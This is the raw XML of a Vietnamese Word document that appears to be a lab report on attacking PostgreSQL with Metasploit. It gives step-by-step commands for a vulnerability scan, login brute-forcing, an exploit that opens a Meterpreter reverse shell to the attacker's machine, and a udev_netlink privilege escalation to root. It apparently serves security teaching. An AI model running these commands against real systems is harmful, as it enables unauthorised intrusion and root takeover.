      <w:r w:rsidR="00F150F2"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2FF6682" wp14:editId="39BEF61D">
            <wp:extent cx="6122769" cy="316992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7030" cy="31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3EE0" w14:textId="67377FC8" w:rsidR="00F150F2" w:rsidRPr="00F150F2" w:rsidRDefault="00F150F2" w:rsidP="00983CC4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AEA86E5" w14:textId="5FA1C4B2" w:rsidR="00F150F2" w:rsidRPr="00F150F2" w:rsidRDefault="00F150F2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>nmap --script=vulscan/vulscan.nse -sV -p5432</w:t>
      </w:r>
      <w:r w:rsidRPr="00F150F2">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.152.13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C03BDF3" w14:textId="0636B85B" w:rsidR="00F150F2" w:rsidRDefault="008F4CAB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>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26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C4B2551" wp14:editId="060D5B0E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>76031</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>793865</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6254640" cy="158400"/>
                <wp:effectExtent l="76200" t="114300" r="51435" b="127635"/>
                <wp:wrapNone/>
                <wp:docPr id="35" name="Viết tay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2546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DC5E4" id="Viết tay 35" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:3.15pt;margin-top:56.85pt;width:498.2pt;height:23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">
                <v:imagedata r:id="rId44" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F150F2"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47DC4E5" wp14:editId="7420DB88">
            <wp:extent cx="6362362" cy="3451860"/>
            <wp:effectExtent l="0" t="0" r="63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5925" cy="34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8387" w14:textId="637D34BF" w:rsid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</w:p>
    <w:p w14:paraId="555D62D8" w14:textId="077AEDB6" w:rsidR="00F150F2" w:rsidRDefault="00F150F2" w:rsidP="00F150F2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F150F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F150F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Khai thác lỗi đăng nhập trên PostgreSQL, cổng 5432:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FE1E23" w14:textId="40480CAA" w:rsidR="00F150F2" w:rsidRPr="00303399" w:rsidRDefault="00F730A2" w:rsidP="00F730A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F730A2">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Khai báo sử dụng mô đun tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271A9B5E" w14:textId="7874A86F" w:rsidR="00303399" w:rsidRPr="00303399" w:rsidRDefault="00303399" w:rsidP="00303399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303399">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>msf &gt; use auxiliary/scanner/postgres/postgres_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6E940D" w14:textId="3E25CA6D" w:rsidR="00303399" w:rsidRDefault="00303399" w:rsidP="00303399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303399">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46CADB8D" wp14:editId="6F55803E">
            <wp:extent cx="4696480" cy="809738"/>
            <wp:effectExtent l="0" t="0" r="889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93D6" w14:textId="441138F3" w:rsidR="00303399" w:rsidRPr="00303399" w:rsidRDefault="00303399" w:rsidP="00303399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303399">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Chạy lệnh “show options” để xem các thông tin về mô đun tấn công đang sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C2A512" w14:textId="77777777" w:rsidR="00303399" w:rsidRPr="00303399" w:rsidRDefault="00303399" w:rsidP="00303399">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7975E342" w14:textId="71F2E731" w:rsidR="00F150F2" w:rsidRDefault="00303399" w:rsidP="00983CC4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00303399">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="005E92A4" wp14:editId="5A832A13">
            <wp:extent cx="6767170" cy="200406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76948" cy="200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BD4" w14:textId="77777777" w:rsidR="00303399" w:rsidRPr="00303399" w:rsidRDefault="00303399" w:rsidP="00303399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303399">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Đặt địa chỉ IP máy victim: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9C3BF7" w14:textId="64351009" w:rsidR="00303399" w:rsidRDefault="00303399" w:rsidP="00303399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303399">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>msf &gt; set RHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;ip_victim&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B522CD" w14:textId="78B896E0" w:rsidR="00303399" w:rsidRDefault="00303399" w:rsidP="00303399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303399">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07FE6D8A" wp14:editId="64A71409">
            <wp:extent cx="5731510" cy="80899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C961" w14:textId="77777777" w:rsidR="00303399" w:rsidRPr="00303399" w:rsidRDefault="00303399" w:rsidP="00303399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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00303399">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Đặt địa tham số dừng: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C810802" w14:textId="0B1A32A1" w:rsidR="00303399" w:rsidRDefault="00303399" w:rsidP="00303399">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00303399">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>msf&gt; set STOP_ON_SUCCESS true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07150623" w14:textId="7C99BE47" w:rsidR="00E167CA" w:rsidRDefault="00E167CA" w:rsidP="00303399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E167CA">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D28E1E3" wp14:editId="568D0F88">
            <wp:extent cx="5731510" cy="738505"/>
            <wp:effectExtent l="0" t="0" r="2540" b="444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D756" w14:textId="77777777" w:rsidR="00E167CA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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E167CA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Thực thi tấn công: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527BDD73" w14:textId="57A418EB" w:rsidR="00E167CA" w:rsidRDefault="00E167CA" w:rsidP="00E167CA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5CC1A4" w14:textId="4319A5CA" w:rsidR="00E167CA" w:rsidRDefault="00E167CA" w:rsidP="00E167CA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E167CA">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4583B61B" wp14:editId="0CF58C72">
            <wp:extent cx="5731510" cy="1539875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="317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0EF3" w14:textId="77777777" w:rsidR="00E167CA" w:rsidRPr="00E167CA" w:rsidRDefault="00E167CA" w:rsidP="00E167CA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E4434F7" w14:textId="5BDD4EF2" w:rsidR="00303399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E167CA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Gõ lệnh exit để kết thúc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542A7686" w14:textId="383AE1F1" w:rsidR="00E167CA" w:rsidRDefault="00E167CA" w:rsidP="00E167CA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E167CA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4119BB5" wp14:editId="328F22E8">
            <wp:extent cx="4658375" cy="733527"/>
            <wp:effectExtent l="0" t="0" r="889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B537" w14:textId="07FF1167" w:rsidR="00E167CA" w:rsidRDefault="00E167CA" w:rsidP="00E167CA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F4B458D" w14:textId="140211DA" w:rsidR="00E167CA" w:rsidRDefault="00E167CA" w:rsidP="00E167CA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E167CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E167CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Khai thác lỗi trên PostgreSQL cho phép mở shell chạy với quyền root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F31FBF" w14:textId="77777777" w:rsidR="00E167CA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Khởi động Metasploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E739F3B" w14:textId="422B8306" w:rsidR="00E167CA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E167CA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Khai báo sử dụng mô đun postgres_payload để tạo 1 phiên kết nối đến CSDL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4E4257" w14:textId="46282FB6" w:rsidR="00E167CA" w:rsidRPr="00C67168" w:rsidRDefault="00C67168" w:rsidP="00E167CA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use exploit/linux/postgres/postgres_payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0771EBA1" w14:textId="1176CF44" w:rsidR="00E167CA" w:rsidRDefault="00C67168" w:rsidP="00E167CA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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15FA2245" wp14:editId="52913FDD">
            <wp:extent cx="5731510" cy="821055"/>
            <wp:effectExtent l="0" t="0" r="254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C3F9" w14:textId="2C14DE68" w:rsid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>Chạy lệnh “show options” để xem các thông tin về mô đun tấn công đang sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A50A28" w14:textId="5349E9B2" w:rsidR="00E167CA" w:rsidRDefault="00C67168" w:rsidP="00E167CA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5597243C" wp14:editId="18EE1F39">
            <wp:extent cx="5731510" cy="2842895"/>
            <wp:effectExtent l="0" t="0" r="254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7A52" w14:textId="77777777" w:rsidR="00E167CA" w:rsidRPr="00E167CA" w:rsidRDefault="00E167CA" w:rsidP="00E167CA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</w:p>
    <w:p w14:paraId="2ECAF97E" w14:textId="77777777" w:rsidR="00E167CA" w:rsidRDefault="00E167CA" w:rsidP="00E167CA">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E167CA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Chọn payload cho thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAC84D4" w14:textId="209F9C8D" w:rsidR="00E167CA" w:rsidRDefault="00E167CA" w:rsidP="00E167CA">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:ind w:left="360"/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set payload linux/x86/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26459874" w14:textId="0ED2C69A" w:rsidR="00E167CA" w:rsidRDefault="00C67168" w:rsidP="00E167CA">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/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4719B964" wp14:editId="671C7680">
            <wp:extent cx="5731510" cy="766445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1F8D" w14:textId="77777777" w:rsidR="00E167CA" w:rsidRPr="00E167CA" w:rsidRDefault="00E167CA" w:rsidP="00E167CA">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="131E0070" w14:textId="77777777" w:rsid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Đặt địa chỉ IP máy victim: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7270372B" w14:textId="1CE673FA" w:rsidR="00E167CA" w:rsidRPr="001C0722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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E167CA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>msf &gt; set RHOST</w:t>
      </w:r>
      <w:r w:rsidR="001C0722">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;ip_Victim&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DB77F3" w14:textId="7D6AE6C7" w:rsidR="00E167CA" w:rsidRPr="00E167CA" w:rsidRDefault="00C67168" w:rsidP="00E167CA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09246BE3" wp14:editId="64065FAB">
            <wp:extent cx="5731510" cy="636905"/>
            <wp:effectExtent l="0" t="0" r="254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CF4D" w14:textId="77777777" w:rsid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Đặt địa chỉ IP máy tấn công: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103726B6" w14:textId="7F8D813C" w:rsidR="00E167CA" w:rsidRPr="001C0722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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E167CA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>msf &gt; set LHOST</w:t>
      </w:r>
      <w:r w:rsidR="001C0722">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;ip_Kali&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DA4A69" w14:textId="51D5D34D" w:rsidR="001C0722" w:rsidRPr="00E167CA" w:rsidRDefault="00C67168" w:rsidP="001C0722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13181AB3" wp14:editId="22812CBD">
            <wp:extent cx="5731510" cy="696595"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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650F" w14:textId="77777777" w:rsid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Đặt mật khẩu cho CSDL: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36866689" w14:textId="22C69A9F" w:rsidR="00E167CA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set PASSWORD postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38267D6F" w14:textId="3012E512" w:rsidR="001C0722" w:rsidRPr="00E167CA" w:rsidRDefault="00C67168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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FEAA866" wp14:editId="15DF6293">
            <wp:extent cx="5731510" cy="783590"/>
            <wp:effectExtent l="0" t="0" r="254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EA4A" w14:textId="77777777" w:rsidR="001C0722" w:rsidRP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E167CA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Thực thi tấn công: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A92E47" w14:textId="790F94A7" w:rsidR="00E167CA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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C6BEA8" w14:textId="5866ACD6" w:rsidR="00C67168" w:rsidRDefault="00C67168" w:rsidP="001C0722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721482CD" wp14:editId="7A45875B">
            <wp:extent cx="5731510" cy="935355"/>
            <wp:effectExtent l="0" t="0" r="254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7477" w14:textId="0DE45998" w:rsidR="00C67168" w:rsidRDefault="00C67168" w:rsidP="00C67168">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77A40D9F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 xml:space="preserve">Chuyển phiên kết nối sang chế độ chạy ngầm sử dụng lệnh “background”: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4DDA43" w14:textId="471DFC2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meterpreter &gt; background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645FB212" w14:textId="43A16977" w:rsidR="00C67168" w:rsidRP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7222CA6B" wp14:editId="3BBC58A4">
            <wp:extent cx="4382112" cy="733527"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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9401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 xml:space="preserve">Đặt mô đun khai thác để mở shell: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2257C490" w14:textId="09C52BC8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use exploit/linux/local/udev_netlink</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2D4E80" w14:textId="27023C5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2A21A9F7" wp14:editId="1F3DF58F">
            <wp:extent cx="5731510" cy="616585"/>
            <wp:effectExtent l="0" t="0" r="254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C277" w14:textId="77777777" w:rsid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 xml:space="preserve">Chọn payload cho thực thi: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD21486" w14:textId="7CD6792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set payload linux/x86/shell_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF3458E" w14:textId="2CDD38A9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760BD7A2" wp14:editId="3242199C">
            <wp:extent cx="5731510" cy="56007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DB5" w14:textId="736BFC0D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>Chạy lệnh “show options” để xem các thông tin về mô đun tấn công đang sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B7CF88" w14:textId="5D809E71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2C6406C0" wp14:editId="6E416305">
            <wp:extent cx="4632960" cy="2524876"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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7370" cy="25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07B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C67168">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Kết nối đến phiên CSDL đang chạy ngầm: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4B36FC" w14:textId="7B0776BC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lastRenderedPageBreak/>
        <w:t>msf &gt; set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6863063A" w14:textId="7D02999E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79F98998" wp14:editId="75208E5E">
            <wp:extent cx="5182323" cy="952633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4A9B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C67168">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Thực thi tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CC2AC5" w14:textId="4047743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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1042A34C" w14:textId="32713942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143926A1" wp14:editId="320CDC6E">
            <wp:extent cx="5731510" cy="1209040"/>
            <wp:effectExtent l="0" t="0" r="254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E2" w14:textId="77777777" w:rsidR="00EA596C" w:rsidRDefault="00C67168" w:rsidP="00EA596C">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA596C">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Chạy các lệnh để đọc tên người dùng và máy victim khai thác thành công: whoami </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052D6FE4" w14:textId="732F8068" w:rsidR="00EA596C" w:rsidRDefault="00C67168" w:rsidP="00EA596C">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA596C">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">uname -a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005E19E2" w14:textId="3EFFC05B" w:rsidR="00EA596C" w:rsidRPr="00EA596C" w:rsidRDefault="00EA596C" w:rsidP="00EA596C">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA596C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74833CE5" wp14:editId="09466442">
            <wp:extent cx="5731510" cy="7785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75E3" w14:textId="6C80DE56" w:rsidR="00C67168" w:rsidRPr="00EA596C" w:rsidRDefault="00C67168" w:rsidP="00EA596C">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA596C">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Gõ lệnh exit và sau đó exit -y lần để kết thúc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DE8972" w14:textId="33720A49" w:rsidR="00EA596C" w:rsidRPr="00EA596C" w:rsidRDefault="00EA596C" w:rsidP="00EA596C">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA596C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39014FBD" wp14:editId="025CC880">
            <wp:extent cx="4572638" cy="666843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596C" w:rsidRPr="00EA59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05F53"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B0E097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2E401A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB160DB6"/>
    <w:lvl w:ilvl="0" w:tplc="4206552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3384F29"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07629E50"/>
    <w:lvl w:ilvl="0" w:tplc="4206552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8F4F0D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7652B3D0"/>
    <w:lvl w:ilvl="0" w:tplc="42065526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53A0DE9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F93AEB3A"/>
    <w:lvl w:ilvl="0" w:tplc="42065526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561"/>
    <w:rsid w:val="001C0722"/>
    <w:rsid w:val="00303399"/>
    <w:rsid w:val="00370561"/>
    <w:rsid w:val="00855BCA"/>
    <w:rsid w:val="008F4CAB"/>
    <w:rsid w:val="00965153"/>
    <w:rsid w:val="00983CC4"/>
    <w:rsid w:val="009E060C"/>
    <w:rsid w:val="00A366A8"/>
    <w:rsid w:val="00C67168"/>
    <w:rsid w:val="00E10670"/>
    <w:rsid w:val="00E167CA"/>
    <w:rsid w:val="00EA596C"/>
    <w:rsid w:val="00F150F2"/>
    <w:rsid w:val="00F730A2"/>
    <w:rsid w:val="00F8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78356"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{ED104A11-7B9A-498E-B8D5-56BA40AFA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vi-V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cs="Mangal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370561"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="KhngDncch">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00E167CA"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"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34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink7.xml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customXml" Target="ink/ink2.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink6.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink9.xm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customXml" Target="ink/ink3.xm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customXml" Target="ink/ink10.xml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image" Target="media/image23.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink8.xm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customXml" Target="ink/ink5.xml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50:21.0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39,'13'-1,"0"0,-1-1,21-6,15-2,99-3,214 9,-193 6,3-2,615 10,-515-9,12 1,-205 3,43 2,-106-7,-2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7:07.6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27,'43'-2,"49"-8,22-2,464 9,-338 5,-452 7,174-4,1 